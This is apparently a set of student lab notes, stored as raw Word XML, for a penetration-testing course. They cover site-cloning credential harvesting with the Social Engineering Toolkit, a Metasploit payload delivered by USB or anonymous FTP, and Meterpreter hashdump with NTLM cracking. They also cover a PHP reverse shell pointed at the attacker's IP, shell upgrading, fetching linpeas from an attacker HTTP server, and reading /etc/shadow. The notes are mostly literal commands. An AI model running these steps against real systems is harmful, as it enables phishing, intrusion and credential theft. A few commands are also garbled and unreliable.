    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0ACFF1B7" w14:textId="40078B9F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“sudo iptables - -flush -t nat”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4E98E93A" w14:textId="3C56AD2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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="31714547" w14:textId="38DC31C4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“sudo iptables -t nat -L PREROUTING”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="21726478" w14:textId="73FCFBD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File Transfer Capture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="051E875C" w14:textId="0FED8DC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Go to Wireshark/File/Export to/SMB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="22E227E6" w14:textId="61BA54B3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10 – Social Engineering Attacks and Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="117B701A" w14:textId="27813CA2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Create a Phishing Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="10CE3D34" w14:textId="3BE8A7C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To the Social Engineering Toolkit in Applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="49E35C1F" w14:textId="6ADF170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sudo password, since this is a social engineering attack, enter 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="066CB4CD" w14:textId="331EF29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a Website Attack, press 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="67891ED8" w14:textId="6556338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a credential Harvester Attack, press 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="66432430" w14:textId="5112D5D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press 2 for a Metasploit Browser Exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5D959977" w14:textId="7B0605B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All of the above methods are used together for a Credential Harvesting on a cloned website attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="580D60E2" w14:textId="486AFE1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Press ENTER to make the POST come back to Kali’s IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4508682B" w14:textId="6B12F8B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website URL that you want to clone.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="560C6068" w14:textId="51B661A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It would be better and look more authentic if we could buy a domain name that was close to the victim’s website’s name (Typo squatting, URL hijacking).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5F2EB739" w14:textId="27F38983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Gain Remote Access from USB Drop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6F44E336" w14:textId="3DE074F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Social Engineering Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="73BA5862" w14:textId="18AC9D7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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5C5245D8" w14:textId="00B3A48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a social engineering attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0EF0C745" w14:textId="1B13BFE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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="287DB666" w14:textId="36AAE0B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an Infectious Media Generator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="461B6751" w14:textId="340C428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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="06F52256" w14:textId="7839D2C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a standard Metasploit Executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1A41B6C7" w14:textId="24DE0D1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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="36DEE816" w14:textId="13265F5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enter your Kali’s IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7AEE45C8" w14:textId="63695D0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the PORT for the reverse listener: enter 9999.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6CF1EB0C" w14:textId="5EB49A6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yes to create a listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2FB2255A" w14:textId="5A6E51C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a separate terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3B3B3C6C" w14:textId="7852AF3A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“sudo -i” to enter root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5D23BF6C" w14:textId="191FF29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cd into the directory that contains the malicious files, should be something like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1F7B38AA" w14:textId="121DE72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“/root/.set/autorun”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7F9C58B4" w14:textId="752F1BF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is for simplicity, but this command copies the malicious executable into a folder, so you don’t have to be root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="36AFFF70" w14:textId="4FB4161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cp program.exe /home/ {some folder name}/Documents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="58EC3B28" w14:textId="23A55F2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If an IP address has the FTP service open on their machine (nmap it) you can deliver the executable this way</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="57991A6F" w14:textId="403353E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 “ftp {victim’s IP address}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="36593823" w14:textId="6D99F6C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For the name, enter “anonymous.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7F6F31E0" w14:textId="2C484ED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Just hit ENTER for the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="208E4D11" w14:textId="1107819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You can enter this command to simply establish a command channel (not the data channel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="340C9336" w14:textId="0736783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“Passive off”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0AE800BB" w14:textId="512358D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Executable files should be sent in binary so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="478D922B" w14:textId="35040C8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“binary”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="21627F41" w14:textId="252CDD3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To establish a data connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3F2B4A9C" w14:textId="0423787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“dir”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7E983E5E" w14:textId="1B550DF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FTP is ready to use now.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="48D5A6A8" w14:textId="1A60A5B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Now enter, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="35556E3D" w14:textId="04C5DEB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“lcd /home/ {some folder name} / Documents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2915066C" w14:textId="21E2704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lcd is Local Change Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5F6AC4B2" w14:textId="603BEB2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Now to transfer the files, enter “mput *”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="182B909D" w14:textId="3EF2A8C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“y” if prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1D45C4EC" w14:textId="43CDE25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Exit once transferred.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2702E3CE" w14:textId="165A376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Once the victim executes the malicious program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="39286D0D" w14:textId="0B7EDC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root reverse shell terminal and type,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3126283F" w14:textId="6353EC1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“sessions”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="19AD6275" w14:textId="28C7F7C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To enter the specific session, type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="75BEE08D" w14:textId="4C1636A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“sessions -i 1”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7B534916" w14:textId="77849C4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Use help for more info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="101C0AAD" w14:textId="32C3A47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More useful commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4184212E" w14:textId="0642339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ps</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="023EFCF8" w14:textId="3EC635F6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Lists the running processes and PID on the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="006B05A7" w14:textId="4634647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Find the PID on Isass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3A562D51" w14:textId="4B24F1A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Use the command “migrate 736” to migrate Meterpreter to the isass.exe PID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="15F38124" w14:textId="2F6BDB6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enter the command “hashdump”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4BAB50F7" w14:textId="01636A5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Admin line and copy it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="071C87F7" w14:textId="4426F60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Create a new file “nano {fileName}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="69B925A2" w14:textId="289C3D7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Paste the ntlm hash in it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0DF9E8E8" w14:textId="40EF674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Save it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2A73BAC7" w14:textId="18FA4EA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Crack it using John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3727AEF2" w14:textId="66DD1E46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Command </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="46FD55D8" w14:textId="656D8B80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“john {fileName} - -format=NT - - wordlist=/usr/share/wordlists/rockyou.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="319A6C10" w14:textId="13571006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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 11 – Post-Exploitation Foothold Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25091D95" w14:textId="703F121A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Recreate a Colleague’s Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3E1BA04E" w14:textId="66F8CB9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Check the NMAP results of your colleague.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="069A9669" w14:textId="5637361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lab, there is an exploit of FTP with an anonymous login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="77624795" w14:textId="7171731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terminal, type “ftp {victim or NMAP result’s IP address}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="72291E4B" w14:textId="69B8C9C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Login with anonymous, password is just ENTER.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="52A065B2" w14:textId="4A2522BD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 “ls” to list directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="11D982ED" w14:textId="5067E79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Open a new tab in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7C0EB2D3" w14:textId="104C27F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new terminal type, “touch test_write &amp;&amp; echo ‘Write Permission Test’ &gt; test_write”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="44CC800D" w14:textId="097C329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original terminal tab and enter,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4751E9D6" w14:textId="55ACBA2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“put test_write files/test_write”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="16C30328" w14:textId="0405A72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Firefox and enter in the URL field,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1A7DD53F" w14:textId="4419575F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hyperlink>
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87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http://{victim</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87F"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 xml:space="preserve"> IP address}/ftp/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11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6940E9AB" w14:textId="0B70E81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Firefox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select the files/ folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6789ACE7" w14:textId="50C23689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You should be able to see the test_write folder you made.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0FC5E32E" w14:textId="37D171F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it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="161BADF2" w14:textId="7D583450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Create Reverse Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="62F5C6D5" w14:textId="13461FA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select the right most tab (Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="527221F4" w14:textId="73D4273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“cp /usr/share/webshells/php/php-reverse-shell.php”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1AF2A0A9" w14:textId="57E0558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“code php-reverse-shell.php”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="17AEAE82" w14:textId="454E8FE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will open it in VS code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="26FB1B44" w14:textId="5D103D1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Make the following changes to the code (around lines 49 and 50)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1082AACF" w14:textId="6D5DE3BE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$ip = ‘{Kali’s IP address}’:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4E3A9C4F" w14:textId="655958CB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$port = 443;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6840C6CF" w14:textId="4E725BC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VS Code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Hit File/Save</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="289EA8C4" w14:textId="0FC7D6E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the left most terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6555BEBE" w14:textId="15525E2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at the ftp prompt,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2FB79034" w14:textId="09877C9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“put php-reverse-shell.php files/php-reverse-shell.php”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="53884B5D" w14:textId="213BA99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Now go to the right most terminal tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="08B7C7FE" w14:textId="05017DE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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5BC9F000" w14:textId="34D44131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“nc -nvlp 443”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="60A52F72" w14:textId="0C80177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Firefox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now type in URL field, “</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87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http://{Victim’s</w:t>
        </w:r>
      </w:hyperlink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IP address}/ftp/files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="28A700F4" w14:textId="4D49E92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Firefox, select the php-reverse-shell.php to execute the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2029870C" w14:textId="6330086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terminal, type “ls”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="409138DF" w14:textId="081AC75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type, “pwd”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25C7907A" w14:textId="081863F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press the Up-Arrow key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="64241B76" w14:textId="66F3E25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 up arrow key was to show that you are not in an interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7DC50229" w14:textId="35C73FEC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Perform Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25660C82" w14:textId="43382F5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 type, “echo $0”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4C3BC4CA" w14:textId="5EAB0F6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 type, “SHELL=/bin/bash script -q /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0307F240" w14:textId="0A4A7B2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command shifts the shell to a bash shell and discards all errors to /dev/null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4B3885B4" w14:textId="3EB3268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“echo $0”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4E9FEFAC" w14:textId="6F5B970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In the terminal, type “nc -nvlp 443”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="00166760" w14:textId="05BC8CC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Firefox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reload the webpage and rerun the php script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="12F07CC5" w14:textId="6EE9E1A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Enter the command |python3 -c ‘import pty; pty.spawn(“/bin/bash”)’|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0DE0FE02" w14:textId="57FDF84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Press Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="774F740E" w14:textId="614A67E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This stops the netcat service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6A473CD6" w14:textId="582DA6A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Now type “stty raw -echo &amp;&amp; fg export TERM-xterm”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0FA581D2" w14:textId="78CF8F6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Go to terminal, type “ls”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1805FAA7" w14:textId="6EBFF41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type, “pwd”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="11220B08" w14:textId="40D43F83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Then press the Up-Arrow key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4C5F72FF" w14:textId="687AC029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Escalate Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="253DFB7A" w14:textId="55BAE10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Open a new tab in Terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="42409294" w14:textId="71E0E65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 the following, “python3 -m http.server 8080”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="22C907B4" w14:textId="747FCA8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Kali Linux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Select the left most terminal tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7B99F6A6" w14:textId="42CB62C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type “cd tmp”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="110793C1" w14:textId="537D197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Type, “wget </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="0C5E9F89" w:rsidR="11A4D87F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http://{Kali</w:t>
        </w:r>
      </w:hyperlink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IP address}:8080/linpeas.sh}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4220828C" w14:textId="4EBB89C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“bash linpeas.sh”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5439C37D" w14:textId="7E1B97A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Takes a while to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2496D8CA" w14:textId="0C05ADF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Observe the legend at the top.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3D4ABDD4" w14:textId="4C4DC310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Any items in red or yellow have a 95% chance of being a privilege escalation vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="789DA16F" w14:textId="79B9D6E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Observe the ‘Interesting Files’ section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1F977343" w14:textId="0967E17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 “cat /etc/shadow”</w:t>
      </w:r>
    </w:p>
